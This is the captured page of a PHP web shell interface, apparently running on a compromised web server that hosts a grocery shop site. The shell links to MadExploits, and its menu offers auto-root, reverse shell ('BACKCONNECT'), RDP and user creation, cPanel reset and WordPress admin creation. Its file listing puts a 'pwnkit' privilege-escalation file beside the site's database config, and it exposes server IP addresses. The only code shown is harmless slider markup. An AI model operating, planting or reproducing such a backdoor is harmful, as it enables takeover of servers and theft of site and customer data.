Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.216.77
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
admin /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
css.php
1004
B
-rw-r--r--
db_config.php
384
B
-rw-r--r--
footer.php
300
B
-rw-r--r--
header.php
1.13
KB
-rw-r--r--
js.php
3.35
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
sidebar.php
3.98
KB
-rw-r--r--
slider.php
458
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slider.php
<section class="carousel-slider-main text-center border-top border-bottom bg-white"> <div class="owl-carousel owl-carousel-slider"> <?php $sql2="SELECT * from slider"; $exe2=mysqli_query($conn,$sql2); while ($res=mysqli_fetch_array($exe2)) { ?> <div class="item"> <a href="#"><img class="img-fluid" src="admin/slider/<?php echo $res['image'];?>" alt="Orange Groceries Product"></a> </div> <?php } ?> </div> </section>
Close